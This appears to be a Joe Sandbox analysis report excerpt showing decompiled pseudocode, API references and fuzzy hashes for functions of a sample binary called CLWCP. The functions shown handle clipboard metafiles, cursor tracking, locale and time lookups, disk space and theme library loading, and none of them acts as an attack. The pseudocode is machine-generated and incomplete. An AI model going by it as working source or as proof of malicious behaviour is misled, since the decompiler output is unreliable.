                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Window$ActiveEnabledEnumIconicNtdllOwnedPopupsProc_ShowWindows
                                  • String ID:
                                  • API String ID: 1952349125-0
                                  • Opcode ID: 68e462262d797aebf062c099a1b8a338bb464d04eee3672a2b578542fead0d97
                                  • Instruction ID: 38f412bdc4aeea992a3b34adffb2ba103466732551451dd1efc0a5d48573fe03
                                  • Opcode Fuzzy Hash: 68e462262d797aebf062c099a1b8a338bb464d04eee3672a2b578542fead0d97
                                  • Instruction Fuzzy Hash: 0F11F4706006009BDB55FF6ACDD6F6637E86F08305F0450BABE05DF297D679D8448718
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004218AC(intOrPtr* __eax, void* __ecx, void* __edx) {
                                  				intOrPtr _v68;
                                  				intOrPtr _v72;
                                  				intOrPtr _v76;
                                  				struct tagENHMETAHEADER _v104;
                                  				void* __ebp;
                                  				intOrPtr _t35;
                                  				intOrPtr* _t37;
                                  				struct HENHMETAFILE__* _t43;
                                  				intOrPtr _t44;
                                  
                                  				_t37 = __eax;
                                  				_t43 = GetClipboardData(0xe);
                                  				if(_t43 == 0) {
                                  					_t35 =  *0x46fc5c; // 0x41b5e0
                                  					E0041EB9C(_t35);
                                  				}
                                  				E00421048(_t37);
                                  				_t44 =  *((intOrPtr*)(_t37 + 0x28));
                                  				 *(_t44 + 8) = CopyEnhMetaFileA(_t43, 0);
                                  				GetEnhMetaFileHeader( *(_t44 + 8), 0x64,  &_v104);
                                  				 *((intOrPtr*)(_t44 + 0xc)) = _v72 - _v104.rclFrame;
                                  				 *((intOrPtr*)(_t44 + 0x10)) = _v68 - _v76;
                                  				 *((short*)(_t44 + 0x18)) = 0;
                                  				 *((char*)(_t37 + 0x2c)) = 1;
                                  				 *((char*)(_t37 + 0x22)) =  *((intOrPtr*)( *_t37 + 0x24))() & 0xffffff00 | _t31 != 0x00000000;
                                  				return  *((intOrPtr*)( *_t37 + 0x10))();
                                  			}













                                  APIs
                                  • GetClipboardData.USER32 ref: 004218B9
                                  • CopyEnhMetaFileA.GDI32(00000000,00000000,0000000E), ref: 004218DB
                                  • GetEnhMetaFileHeader.GDI32(?,00000064,?,00000000,00000000,0000000E), ref: 004218ED
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileMeta$ClipboardCopyDataHeader
                                  • String ID:
                                  • API String ID: 1752724394-0
                                  • Opcode ID: 2876691f48c95dc867315baa17f2a36dd0019d17157e4527e416a326f54baac6
                                  • Instruction ID: baa0d9de041a34853484338ffc7cd4c8ff110e42a940323a5d6cdd85515be475
                                  • Opcode Fuzzy Hash: 2876691f48c95dc867315baa17f2a36dd0019d17157e4527e416a326f54baac6
                                  • Instruction Fuzzy Hash: 4D117C727002048FC710DFAAC881A9ABBF8AF04310F21457EE909DB252DA75EC48CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0045478C() {
                                  				struct tagPOINT _v12;
                                  				void* _t5;
                                  				long _t6;
                                  				void* _t17;
                                  				void* _t20;
                                  
                                  				 *0x470b50 = GetCurrentThreadId();
                                  				L5:
                                  				_t5 =  *0x470b54; // 0x0
                                  				_t6 = WaitForSingleObject(_t5, 0x64);
                                  				if(_t6 == 0x102) {
                                  					if( *0x470b40 != 0 &&  *((intOrPtr*)( *0x470b40 + 0x60)) != 0) {
                                  						GetCursorPos( &_v12);
                                  						if(E00433318( &_v12) == 0) {
                                  							E0045729C( *0x470b40, _t17, _t20);
                                  						}
                                  					}
                                  					goto L5;
                                  				}
                                  				return _t6;
                                  			}









                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00454798
                                  • GetCursorPos.USER32(?), ref: 004547B5
                                  • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 004547D5
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CurrentCursorObjectSingleThreadWait
                                  • String ID:
                                  • API String ID: 1359611202-0
                                  • Opcode ID: cd564bc254a408d91d4be8c108044f8e29921b968183628e56204ccfdc8e3892
                                  • Instruction ID: 8cd83658b4cea4d4cb8d9c267ad8d12464bc52c494f08954f8e3ebcabef4b698
                                  • Opcode Fuzzy Hash: cd564bc254a408d91d4be8c108044f8e29921b968183628e56204ccfdc8e3892
                                  • Instruction Fuzzy Hash: 90F0BE31504204DBDB10A6A5D887B4A73E8AB4971EF000677E9049F2D3EB7EAAC8C65D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0043AB48(intOrPtr* __eax, intOrPtr __edx) {
                                  				intOrPtr _v8;
                                  				void* __ecx;
                                  				void* _t25;
                                  				intOrPtr* _t31;
                                  				void* _t34;
                                  				intOrPtr* _t37;
                                  				void* _t46;
                                  
                                  				_v8 = __edx;
                                  				_t37 = __eax;
                                  				if(( *(_v8 + 4) & 0x0000fff0) != 0xf100 ||  *((short*)(_v8 + 8)) == 0x20 ||  *((short*)(_v8 + 8)) == 0x2d || IsIconic( *(__eax + 0x188)) != 0 || GetCapture() != 0) {
                                  					L8:
                                  					if(( *(_v8 + 4) & 0x0000fff0) != 0xf100) {
                                  						L10:
                                  						return  *((intOrPtr*)( *_t37 - 0x10))();
                                  					}
                                  					_t25 = E0043AA98(_t37, _t46);
                                  					if(_t25 == 0) {
                                  						goto L10;
                                  					}
                                  				} else {
                                  					_t31 =  *0x46fc50; // 0x470b40
                                  					if(_t37 ==  *((intOrPtr*)( *_t31 + 0x44))) {
                                  						goto L8;
                                  					} else {
                                  						_t34 = E0044C8E0(_t37, 1);
                                  						_t45 = _t34;
                                  						if(_t34 == 0) {
                                  							goto L8;
                                  						} else {
                                  							_t25 = E00435DE4(_t45, 0, 0xb017, _v8);
                                  							if(_t25 == 0) {
                                  								goto L8;
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t25;
                                  			}











                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CaptureIconic
                                  • String ID:
                                  • API String ID: 2277910766-0
                                  • Opcode ID: b2cf1ad6e2f90d565603312f766d18725aa2497b4b1691f0b8744ad873f86363
                                  • Instruction ID: 6157f2a2bc67ed2cc0ecf365663096764261e245ee55338c55d371a54aff1bfc
                                  • Opcode Fuzzy Hash: b2cf1ad6e2f90d565603312f766d18725aa2497b4b1691f0b8744ad873f86363
                                  • Instruction Fuzzy Hash: CE11E232B002099BDB10DB58C4C4EAAF3E9AF08304F645476E500CB352DBB8FD109B59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E0041EC2C(void* __ebx) {
                                  				char _v260;
                                  				char _v264;
                                  				long _t21;
                                  				void* _t22;
                                  				intOrPtr _t27;
                                  				void* _t32;
                                  
                                  				_v264 = 0;
                                  				_push(_t32);
                                  				_push(0x41ecc8);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t32 + 0xfffffefc;
                                  				_t21 = GetLastError();
                                  				if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
                                  					E0041EBD8(_t22);
                                  				} else {
                                  					E0040438C( &_v264, 0x100,  &_v260);
                                  					E0040B830(_v264, 1);
                                  					E00403B64();
                                  				}
                                  				_pop(_t27);
                                  				 *[fs:eax] = _t27;
                                  				_push(0x41eccf);
                                  				return E0040411C( &_v264);
                                  			}










                                  APIs
                                  • GetLastError.KERNEL32(00000000,0041ECC8,?,00000000,?,0041ECE0,00000000,00422613,00000000,00000000,004227B3,?,00000000,00000054,?,00000000), ref: 0041EC4C
                                  • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,0041ECC8,?,00000000,?,0041ECE0,00000000,00422613,00000000), ref: 0041EC72
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ErrorFormatLastMessage
                                  • String ID:
                                  • API String ID: 3479602957-0
                                  • Opcode ID: c7fc891f6606528792b0f48ccbacbe00a73f583689e9eab362d1f8ca60587d33
                                  • Instruction ID: afd6d2d3d5c9c94e6f243e9b04bae9930ee68683dc30aa0030e2c1d1867d71f2
                                  • Opcode Fuzzy Hash: c7fc891f6606528792b0f48ccbacbe00a73f583689e9eab362d1f8ca60587d33
                                  • Instruction Fuzzy Hash: 9201FC742043455BE711EB678C82BD672ACE754704F50407BFE44A72C2FAB86DC0855C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00408604(void* __eax, WORD* __ecx, signed int __edx) {
                                  				WORD* _t15;
                                  				void* _t21;
                                  				long _t22;
                                  
                                  				_t15 = __ecx;
                                  				 *(__ecx + 0x10) =  !__edx & 0x00000016;
                                  				_t21 = FindFirstFileA(E004045DC(__eax), __ecx + 0x18);
                                  				 *((intOrPtr*)(_t15 + 0x14)) = _t21;
                                  				if(_t21 == 0xffffffff) {
                                  					_t22 = GetLastError();
                                  				} else {
                                  					_t22 = E00408598(_t15);
                                  					if(_t22 != 0) {
                                  						E00408678(_t15);
                                  					}
                                  				}
                                  				return _t22;
                                  			}







                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?,?,00000000,00000000,0046C1FB,00000000,0046C3C2), ref: 0040861F
                                  • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,0046C1FB,00000000,0046C3C2), ref: 00408644
                                    • Part of subcall function 00408598: FileTimeToLocalFileTime.KERNEL32(?), ref: 004085C8
                                    • Part of subcall function 00408598: FileTimeToDosDateTime.KERNEL32 ref: 004085D7
                                    • Part of subcall function 00408678: FindClose.KERNEL32(?,?,00408642,00000000,?,?,00000000,00000000,0046C1FB,00000000,0046C3C2), ref: 00408684
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileTime$Find$CloseDateErrorFirstLastLocal
                                  • String ID:
                                  • API String ID: 976985129-0
                                  • Opcode ID: e16cdd7c74d39f95b10b21f91a9d886f8b9cf60cbd8772e3331f9e28e5cf8609
                                  • Instruction ID: ff421c1de536aa3811b9a6ee9c6cc55e6393863a066716efdd391ff6a9796392
                                  • Opcode Fuzzy Hash: e16cdd7c74d39f95b10b21f91a9d886f8b9cf60cbd8772e3331f9e28e5cf8609
                                  • Instruction Fuzzy Hash: 32E0A072A0112017C714AAAD9D8155F51C84A85378306167FB945FB283DD38CC1283D8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00408862(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                  				long _v8;
                                  				long _v12;
                                  				long _v16;
                                  				long _v20;
                                  				intOrPtr _v24;
                                  				signed int _v28;
                                  				CHAR* _t25;
                                  				int _t26;
                                  				intOrPtr _t31;
                                  				intOrPtr _t34;
                                  				intOrPtr* _t39;
                                  				intOrPtr* _t40;
                                  				intOrPtr _t48;
                                  				intOrPtr _t50;
                                  
                                  				_t25 = _a4;
                                  				if(_t25 == 0) {
                                  					_t25 = 0;
                                  				}
                                  				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
                                  				_v28 = _v8 * _v12;
                                  				_v24 = 0;
                                  				_t48 = _v24;
                                  				_t31 = E00404EF0(_v28, _t48, _v16, 0);
                                  				_t39 = _a8;
                                  				 *_t39 = _t31;
                                  				 *((intOrPtr*)(_t39 + 4)) = _t48;
                                  				_t50 = _v24;
                                  				_t34 = E00404EF0(_v28, _t50, _v20, 0);
                                  				_t40 = _a12;
                                  				 *_t40 = _t34;
                                  				 *((intOrPtr*)(_t40 + 4)) = _t50;
                                  				return _t26;
                                  			}


















                                  APIs
                                  • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00408885
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: DiskFreeSpace
                                  • String ID:
                                  • API String ID: 1705453755-0
                                  • Opcode ID: e0f5f6d17ac78af4b02de4df6a086a2a3e69240104d60bac68db34341ef77bc2
                                  • Instruction ID: 7e4b8752b078cf5247d4ecb0c82ace8a0af0dac2d7f8e56e8aaaba7ec49f0b69
                                  • Opcode Fuzzy Hash: e0f5f6d17ac78af4b02de4df6a086a2a3e69240104d60bac68db34341ef77bc2
                                  • Instruction Fuzzy Hash: A71100B5A00209AFDB04CF99C881DAFB7F9FFC8304B14C569A509E7251E6319E018BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 51%
                                  			E00405CCE(int __eax, void* __ebx, void* __eflags) {
                                  				char _v8;
                                  				char _v15;
                                  				char _v20;
                                  				intOrPtr _t29;
                                  				void* _t32;
                                  
                                  				_v20 = 0;
                                  				_push(_t32);
                                  				_push(0x405d36);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t32 + 0xfffffff0;
                                  				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
                                  				E0040438C( &_v20, 7,  &_v15);
                                  				E00402DE8(_v20,  &_v8);
                                  				if(_v8 != 0) {
                                  				}
                                  				_pop(_t29);
                                  				 *[fs:eax] = _t29;
                                  				_push(E00405D3D);
                                  				return E0040411C( &_v20);
                                  			}









                                  APIs
                                  • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00405D36), ref: 00405CF6
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: ea2610eff1eca33162b1406312ad9ed308ccfb9553fe294e29c75d28227dac15
                                  • Instruction ID: 7f68ee31be462983b6b581755d2b664830700bcaa6991b8e869a7ba904a132b5
                                  • Opcode Fuzzy Hash: ea2610eff1eca33162b1406312ad9ed308ccfb9553fe294e29c75d28227dac15
                                  • Instruction Fuzzy Hash: ADF0A930A04709AFE714EEA1CC46AEEB376EBC5714F40887BA510B71D0E6782A04CA54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 51%
                                  			E00405CD0(int __eax, void* __ebx, void* __eflags) {
                                  				char _v8;
                                  				char _v15;
                                  				char _v20;
                                  				intOrPtr _t29;
                                  				void* _t32;
                                  
                                  				_v20 = 0;
                                  				_push(_t32);
                                  				_push(0x405d36);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t32 + 0xfffffff0;
                                  				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
                                  				E0040438C( &_v20, 7,  &_v15);
                                  				E00402DE8(_v20,  &_v8);
                                  				if(_v8 != 0) {
                                  				}
                                  				_pop(_t29);
                                  				 *[fs:eax] = _t29;
                                  				_push(E00405D3D);
                                  				return E0040411C( &_v20);
                                  			}









                                  APIs
                                  • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00405D36), ref: 00405CF6
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: 7035f4c54bbb58942f31f3259e6e8a0099fd8ccb2a83d2b8b1e7a2b0306c6af0
                                  • Instruction ID: 2ee38d1922a8d6628af9f96e7d88a8de41702a51ef3945bdfdcedc6e5521318e
                                  • Opcode Fuzzy Hash: 7035f4c54bbb58942f31f3259e6e8a0099fd8ccb2a83d2b8b1e7a2b0306c6af0
                                  • Instruction Fuzzy Hash: 6DF0CD30904709AFE714EF91CC46AEEB376FBC5714F40887BA510771D0E7782A04CA54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040B068(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
                                  				char _v260;
                                  				intOrPtr _t10;
                                  				void* _t18;
                                  
                                  				_t18 = __ecx;
                                  				_t10 = _a4;
                                  				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
                                  					return E00404170(_t10, _t18);
                                  				}
                                  				return E0040420C(_t10, _t5 - 1,  &_v260);
                                  			}







                                  APIs
                                  • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040B086
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: f4d49c88b2b623f0fe3eaed7e9b0acce4e93916ae7e8fcb20e38ee687be1632f
                                  • Instruction ID: c691e71b8d0f6d085652890316cdc29bc24c20f07b1cdb32de9599e2e27a24df
                                  • Opcode Fuzzy Hash: f4d49c88b2b623f0fe3eaed7e9b0acce4e93916ae7e8fcb20e38ee687be1632f
                                  • Instruction Fuzzy Hash: 7EE0927171021416D315A5595C869E7729CD798310F0042BFBE15E73C2EEB99D8042ED
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0040B0B4(int __eax, signed int __ecx, int __edx) {
                                  				char _v16;
                                  				signed int _t5;
                                  				signed int _t6;
                                  
                                  				_push(__ecx);
                                  				_t6 = __ecx;
                                  				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
                                  					_t5 = _t6;
                                  				} else {
                                  					_t5 = _v16 & 0x000000ff;
                                  				}
                                  				return _t5;
                                  			}







                                  APIs
                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040C82E,00000000,0040CA47,?,?,00000000,00000000), ref: 0040B0C7
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: c21801bdc333d7a8c847a4a423d6a81d23b251c1c785f1e98f1b88fec7770ac0
                                  • Instruction ID: 82c7e0c176c39547d5d33f7f4f80d15a263d45c03e77ac78b6eae8b631033410
                                  • Opcode Fuzzy Hash: c21801bdc333d7a8c847a4a423d6a81d23b251c1c785f1e98f1b88fec7770ac0
                                  • Instruction Fuzzy Hash: FCD05E6230D2642AE210615B2D85D7BAADCCBC67A1F10807FB658D6282D2258C0693B9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00409B44() {
                                  				struct _SYSTEMTIME* _t2;
                                  
                                  				GetLocalTime(_t2);
                                  				return _t2->wYear & 0x0000ffff;
                                  			}





                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: LocalTime
                                  • String ID:
                                  • API String ID: 481472006-0
                                  • Opcode ID: 1ce6753cc2ea13f5e91634e1fbfe1eea770abd53abc073e18ea36a898be9a820
                                  • Instruction ID: 0e8f06d997aabaabdb70fbd4158b2c6bca8ec53de24db574045d7edb098f9dcd
                                  • Opcode Fuzzy Hash: 1ce6753cc2ea13f5e91634e1fbfe1eea770abd53abc073e18ea36a898be9a820
                                  • Instruction Fuzzy Hash: 4CA0121040482001C140331D0C0313530406801620FC4076978F8542E2E92E013060DB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E00427208(void* __ebx, void* __ecx) {
                                  				char _v5;
                                  				intOrPtr _t2;
                                  				intOrPtr _t6;
                                  				intOrPtr _t108;
                                  				intOrPtr _t111;
                                  
                                  				_t2 =  *0x470a4c; // 0x20f0c14
                                  				E00427000(_t2);
                                  				_push(_t111);
                                  				_push(0x4275bb);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t111;
                                  				 *0x470a48 =  *0x470a48 + 1;
                                  				if( *0x470a44 == 0) {
                                  					 *0x470a44 = LoadLibraryA("uxtheme.dll");
                                  					if( *0x470a44 > 0) {
                                  						 *0x470984 = GetProcAddress( *0x470a44, "OpenThemeData");
                                  						 *0x470988 = GetProcAddress( *0x470a44, "CloseThemeData");
                                  						 *0x47098c = GetProcAddress( *0x470a44, "DrawThemeBackground");
                                  						 *0x470990 = GetProcAddress( *0x470a44, "DrawThemeText");
                                  						 *0x470994 = GetProcAddress( *0x470a44, "GetThemeBackgroundContentRect");
                                  						 *0x470998 = GetProcAddress( *0x470a44, "GetThemeBackgroundContentRect");
                                  						 *0x47099c = GetProcAddress( *0x470a44, "GetThemePartSize");
                                  						 *0x4709a0 = GetProcAddress( *0x470a44, "GetThemeTextExtent");
                                  						 *0x4709a4 = GetProcAddress( *0x470a44, "GetThemeTextMetrics");
                                  						 *0x4709a8 = GetProcAddress( *0x470a44, "GetThemeBackgroundRegion");
                                  						 *0x4709ac = GetProcAddress( *0x470a44, "HitTestThemeBackground");
                                  						 *0x4709b0 = GetProcAddress( *0x470a44, "DrawThemeEdge");
                                  						 *0x4709b4 = GetProcAddress( *0x470a44, "DrawThemeIcon");
                                  						 *0x4709b8 = GetProcAddress( *0x470a44, "IsThemePartDefined");
                                  						 *0x4709bc = GetProcAddress( *0x470a44, "IsThemeBackgroundPartiallyTransparent");
                                  						 *0x4709c0 = GetProcAddress( *0x470a44, "GetThemeColor");
                                  						 *0x4709c4 = GetProcAddress( *0x470a44, "GetThemeMetric");
                                  						 *0x4709c8 = GetProcAddress( *0x470a44, "GetThemeString");
                                  						 *0x4709cc = GetProcAddress( *0x470a44, "GetThemeBool");
                                  						 *0x4709d0 = GetProcAddress( *0x470a44, "GetThemeInt");
                                  						 *0x4709d4 = GetProcAddress( *0x470a44, "GetThemeEnumValue");
                                  						 *0x4709d8 = GetProcAddress( *0x470a44, "GetThemePosition");
                                  						 *0x4709dc = GetProcAddress( *0x470a44, "GetThemeFont");
                                  						 *0x4709e0 = GetProcAddress( *0x470a44, "GetThemeRect");
                                  						 *0x4709e4 = GetProcAddress( *0x470a44, "GetThemeMargins");
                                  						 *0x4709e8 = GetProcAddress( *0x470a44, "GetThemeIntList");
                                  						 *0x4709ec = GetProcAddress( *0x470a44, "GetThemePropertyOrigin");
                                  						 *0x4709f0 = GetProcAddress( *0x470a44, "SetWindowTheme");
                                  						 *0x4709f4 = GetProcAddress( *0x470a44, "GetThemeFilename");
                                  						 *0x4709f8 = GetProcAddress( *0x470a44, "GetThemeSysColor");
                                  						 *0x4709fc = GetProcAddress( *0x470a44, "GetThemeSysColorBrush");
                                  						 *0x470a00 = GetProcAddress( *0x470a44, "GetThemeSysBool");
                                  						 *0x470a04 = GetProcAddress( *0x470a44, "GetThemeSysSize");
                                  						 *0x470a08 = GetProcAddress( *0x470a44, "GetThemeSysFont");
                                  						 *0x470a0c = GetProcAddress( *0x470a44, "GetThemeSysString");
                                  						 *0x470a10 = GetProcAddress( *0x470a44, "GetThemeSysInt");
                                  						 *0x470a14 = GetProcAddress( *0x470a44, "IsThemeActive");
                                  						 *0x470a18 = GetProcAddress( *0x470a44, "IsAppThemed");
                                  						 *0x470a1c = GetProcAddress( *0x470a44, "GetWindowTheme");
                                  						 *0x470a20 = GetProcAddress( *0x470a44, "EnableThemeDialogTexture");
                                  						 *0x470a24 = GetProcAddress( *0x470a44, "IsThemeDialogTextureEnabled");
                                  						 *0x470a28 = GetProcAddress( *0x470a44, "GetThemeAppProperties");
                                  						 *0x470a2c = GetProcAddress( *0x470a44, "SetThemeAppProperties");
                                  						 *0x470a30 = GetProcAddress( *0x470a44, "GetCurrentThemeName");
                                  						 *0x470a34 = GetProcAddress( *0x470a44, "GetThemeDocumentationProperty");
                                  						 *0x470a38 = GetProcAddress( *0x470a44, "DrawThemeParentBackground");
                                  						 *0x470a3c = GetProcAddress( *0x470a44, "EnableTheming");
                                  					}
                                  				}
                                  				_v5 =  *0x470a44 > 0;
                                  				_pop(_t108);
                                  				 *[fs:eax] = _t108;
                                  				_push(0x4275c2);
                                  				_t6 =  *0x470a4c; // 0x20f0c14
                                  				return E00427008(_t6);
                                  			}









                                  APIs
                                  • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,004275BB), ref: 0042723E
                                  • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 00427256
                                  • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 00427268
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0042727A
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0042728C
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042729E
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 004272B0
                                  • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 004272C2
                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 004272D4
                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 004272E6
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 004272F8
                                  • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0042730A
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0042731C
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0042732E
